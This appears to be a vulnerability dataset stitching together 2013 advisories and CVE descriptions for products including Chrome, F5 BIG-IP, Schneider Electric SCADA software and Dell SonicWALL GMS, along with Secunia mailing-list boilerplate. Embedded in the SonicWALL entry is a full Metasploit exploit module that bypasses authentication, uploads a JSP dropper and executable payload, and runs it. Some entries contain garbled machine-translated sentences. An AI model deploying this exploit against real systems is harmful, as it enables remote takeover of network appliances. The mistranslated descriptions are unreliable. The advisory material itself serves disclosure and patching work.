http://secunia.com/advisories/51846/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51846/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51846 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Microsoft has reported a vulnerability in Lenovo Bluetooth with Enhanced Data Rate Software, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the application loading libraries in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening certain files on a remote WebDAV or SMB share. Successful exploitation allows execution of arbitrary code. The vulnerability is reported in versions 6.4.0.2900 and prior. SOLUTION: Update to version 6.5.1.2700. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Haifei Li, Microsoft. ORIGINAL ADVISORY: Lenovo: http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/g4wb10ww.txt MSVR: http://technet.microsoft.com/en-us/security/msvr/msvr13-001 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

content/renderer/media/webrtc_audio_renderer.cc in Google Chrome before 24.0.1312.56 on Mac OS X does not use an appropriate buffer size for the 96 kHz sampling rate, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a web site that provides WebRTC audio. Google Chrome is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 24.0.1312.56 are vulnerable. This BID is being retired. The following individual records exist to better document the issues: 59680 Google Chrome CVE-2013-0842 Unspecified Security Vulnerability 59681 Google Chrome CVE-2013-0840 Unspecified Security Vulnerability 59682 Google Chrome CVE-2013-0841 Unspecified Security Vulnerability 59685 Google Chrome CVE-2013-0843 Denial of Service Vulnerability 59683 Google Chrome CVE-2013-0839 Use-After-Free Memory Corruption Vulnerability. Attackers can exploit this issue to crash the application, denying service to legitimate users. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA51935 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51935/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51935 RELEASE DATE: 2013-01-23 DISCUSS ADVISORY: http://secunia.com/advisories/51935/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51935/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51935 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Google Chrome, where some have unknown impacts and others can be exploited by malicious people to compromise a user's system. 1) A use-after-free error exists when handling canvas font. 2) An error exists when validating the URL when opening new windows. 3) An array indexing error exists when blocking certain contents. 4) An error exists when handling NULL characters embedded in paths. 5) An error exists when handling unsupported RTC sampling rate. NOTE: This vulnerability affects Mac only. SOLUTION: Update to version 24.0.1312.56. PROVIDED AND/OR DISCOVERED BY: 2) Reported by the vendor. The vendor credits: 1) Atte Kettunen, OUSPG. 5) Ted Nakamura, Chromium development community. ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2013/01/stable-channel-update_22.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

XML External Entity (XXE) vulnerability in sam/admin/vpe2/public/php/server.php in F5 BIG-IP 10.0.0 through 10.2.4 and 11.0.0 through 11.2.1 allows remote authenticated users to read arbitrary files via a crafted XML file. F5 BIG-IP is an application switch. Allows authenticated attackers to download arbitrary files from the system in the \"apache\" OS user context. The BIG-IP configuration allows users to access the /etc/shadow file to obtain user password hashes. Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: F5 Products XML Entity References Information Disclosure Vulnerability SECUNIA ADVISORY ID: SA51986 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51986/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51986 RELEASE DATE: 2013-01-25 DISCUSS ADVISORY: http://secunia.com/advisories/51986/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51986/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51986 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SEC Consult has reported a vulnerability in F5 Products, which can be exploited by malicious users to disclose certain sensitive information. The vulnerability is caused due to an error in the web interface XML parser when validating XML requests and can be exploited to e.g. disclose local files. The vulnerability is reported in the following products: * BIG-IP LTM versions 10.x and 11.x * BIG-IP GTM versions 10.x and 11.x * BIG-IP ASM versions 10.x and 11.x * BIG-IP Link Controller versions 10.x and 11.x * BIG-IP WebAccelerator versions 10.x and 11.x * BIG-IP PSM versions 10.x and 11.x * BIG-IP WOM versions 10.x and 11.x * BIG-IP APM versions 10.x and 11.x * BIG-IP Edge Gateway versions 10.x and 11.x * BIG-IP Analytics version 11.x SOLUTION: Update to a fixed version (Please see vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Stefan Viehb\xf6ck, SEC Consult. ORIGINAL ADVISORY: sol14138: http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html SEC Consult: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-0_F5_BIG-IP_XML_External_Entity_Injection_v10.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in RFManagerService.exe in Schneider Electric Accutech Manager 2.00.1 and earlier allows remote attackers to execute arbitrary code via a crafted HTTP request. Schneider Electric Accutech Manager is a real-time monitoring and management software based on windows services. Accutech Manager is prone to a remote heap-based buffer-overflow vulnerability. Failed exploit attempts will result in a denial-of-service condition. Accutech Manager 2.00.1 and prior are vulnerable. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Accutech Manager Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA52034 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52034/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52034 RELEASE DATE: 2013-01-31 DISCUSS ADVISORY: http://secunia.com/advisories/52034/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52034/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52034 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Accutech Manager, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. The vulnerability is reported in versions 2.00.1 and prior. SOLUTION: No official solution is currently available. A fix is scheduled to be released in February 2013. PROVIDED AND/OR DISCOVERED BY: The vendor credits Exodus Intelligence. ORIGINAL ADVISORY: http://www.schneider-electric.com/sites/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130121_advisory_of_vulnerability_affecting_accutech_manager_software.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco WebEx Training Center allow remote authenticated users to bypass intended privilege restrictions and (1) enable or (2) disable training-center recordings via a crafted URL, aka Bug ID CSCzu81065. Cisco WebEx Training Center Has been bypassed by permissions, training-center Records of (1) Activation, or (2) There are vulnerabilities that are disabled. Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM)

Allows an attacker to perform malicious actions. The Cisco Linksys WRT54GL Router is a wireless routing device. A security vulnerability exists in the Cisco Linksys WRT54GL Router. Due to the lack of filtering on the wan_hostnam parameter, an attacker can exploit the vulnerability to inject and execute arbitrary shell commands. Since changing the current password does not require providing current password information, an attacker is allowed to submit a malicious request to change the password information. A command-execution vulnerability 2. A security-bypass vulnerability 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability 5. Cisco Linksys WRT54GL 1.1 running firmware version 4.30.15 build 2 is vulnerable; other versions may also be affected

Schneider Electric and the 7T Interactive Graphical SCADA System are automated monitoring and control systems. The Interactive Graphical SCADA System has an unspecified error in dc.exe when processing certain requests, allowing an attacker to submit a malicious request to the TCP 12397 port to trigger a buffer overflow that can crash the application service. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Interactive Graphical SCADA System Data Collector Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA51819 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51819/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51819 RELEASE DATE: 2013-01-17 DISCUSS ADVISORY: http://secunia.com/advisories/51819/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51819/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51819 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Interactive Graphical SCADA System, which can be exploited by malicious people to compromise a vulnerable system. SOLUTION: Apply patch. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Aaron Portnoy, Exodus Intelligence. ORIGINAL ADVISORY: http://www2.schneider-electric.com/sites/corporate/en/support/cybersecurity/cyber-security-vulnerabilities-sorted.page http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Axway Secure Messenger before 6.5 Updated Release 7, as used in Axway Email Firewall, provides different responses to authentication requests depending on whether the user exists, which allows remote attackers to enumerate users via a series of requests. Axway Secure Messenger is prone to an information-disclosure vulnerability. Attackers can exploit this issue to retrieve sensitive information. Information harvested may aid in launching further attacks. Axway Secure Messenger 6.5 is vulnerable; other versions may also be affected. Axway Secure Messenger is a suite of email encryption software from Axway, France. The software supports encrypting and authenticating emails, automating tracking of message delivery, and more. Specifically, two (2) JSESSIONIDs are returned for valid users, and one (1) for invalid users. Solution: Upgrade to Secure Messenger version 6.5 Updated Release 7, or migrate to Axway MailGate 5.2.0 (or later) for the equivalent functionality. Contact: support.axway.com

Watson SHDSL Routers is a router device. The Watson SHDSL Routers watson management console incorrectly filters user-submitted HTTP requests, allowing attackers to exploit vulnerabilities for directory traversal attacks to obtain sensitive file information.

An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products

An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the "appliance" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used. }, 'Author' => [ 'Nikolas Sotiriu', # Vulnerability Discovery 'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-1359'], [ 'OSVDB', '89347' ], [ 'BID', '57445' ], [ 'EDB', '24204' ] ], 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'Targets' => [ [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 17 2012')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) ], self.class) end def on_new_session # on_new_session will force stdapi to load (for Linux meterpreter) end def generate_jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) var_data = Rex::Text.rand_text_alpha(rand(8)+8) var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) var_counter = Rex::Text.rand_text_alpha(rand(8)+8) var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) var_comb = Rex::Text.rand_text_alpha(rand(8)+8) var_exe = Rex::Text.rand_text_alpha(rand(8)+8) @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) var_proc = Rex::Text.rand_text_alpha(rand(8)+8) var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) jspraw = "<%@ page import=\"java.io.*\" %>\n" jspraw << "<%\n" jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" jspraw << "String #{var_data} = \"\";\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" jspraw << "}\n" jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" jspraw << "#{var_inputstream}.close();\n" jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" jspraw << "{\n" jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" jspraw << "#{var_comb} <<= 4;\n" jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" jspraw << "}\n" jspraw << "#{var_outputstream}.write(#{var_bytes});\n" jspraw << "#{var_outputstream}.close();\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" jspraw << "String[] #{var_fperm} = new String[3];\n" jspraw << "#{var_fperm}[0] = \"chmod\";\n" jspraw << "#{var_fperm}[1] = \"+x\";\n" jspraw << "#{var_fperm}[2] = #{var_exepath};\n" jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" jspraw << "if (#{var_proc}.waitFor() == 0) {\n" jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" # Linux and other UNICES allow removing files while they are in use... jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" jspraw << "} else {\n" # Windows does not .. jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" jspraw << "%>\n" return jspraw end def get_install_path res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'connection' => 'TE, close', 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'vars_post' => { 'num' => '123456', 'action' => 'show_diagnostics', 'task' => 'search', 'item' => 'application_log', 'criteria' => '*.*', 'width' => '500' } }) if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ return $1 end return nil end def upload_file(location, filename, contents) post_data = Rex::MIME::Message.new post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'connection' => 'TE, close' }) if res and res.code == 200 and res.body.empty? return true else return false end end def check @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' if get_install_path.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' # Get Tomcat installation path print_status("#{@peer} - Retrieving Tomcat installation path...") install_path = get_install_path if install_path.nil? fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") end print_good("#{@peer} - Tomcat installed on #{install_path}") if target['Platform'] == "linux" @location = "#{install_path}webapps/appliance/" elsif target['Platform'] == "win" @location = "#{install_path}webapps\\appliance\\" end # Upload the JSP and the raw payload @jsp_name = rand_text_alphanumeric(8+rand(8)) jspraw = generate_jsp # Specify the payload in hex as an extra file.. payload_hex = payload.encoded_exe.unpack('H*')[0] print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") end print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@jsp_name}.jsp", jspraw) print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") end print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") res = send_request_cgi( { 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", 'method' => 'GET' }) if res and res.code != 200 print_warning("#{@peer} - Error triggering the payload") end register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") end end

The client in Schneider Electric Software Update (SESU) Utility 1.0.x and 1.1.x does not ensure that updates have a valid origin, which allows man-in-the-middle attackers to spoof updates, and consequently execute arbitrary code, by modifying the data stream on TCP port 80. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. The Schneider Electric software on the customer's PC uses the SESU service as the communication mechanism for the Schneider Electric Center Update Server, which can be used to receive software updates on a regular basis. The SESU client on the client PC does not check the authenticity of the source. By redirecting the message to port 80 of the unauthorized source, the attacker can execute arbitrary code on the system. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Multiple Products SESU Update Spoofing Vulnerability SECUNIA ADVISORY ID: SA51849 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51849/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51849 RELEASE DATE: 2013-01-17 DISCUSS ADVISORY: http://secunia.com/advisories/51849/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51849/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51849 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING 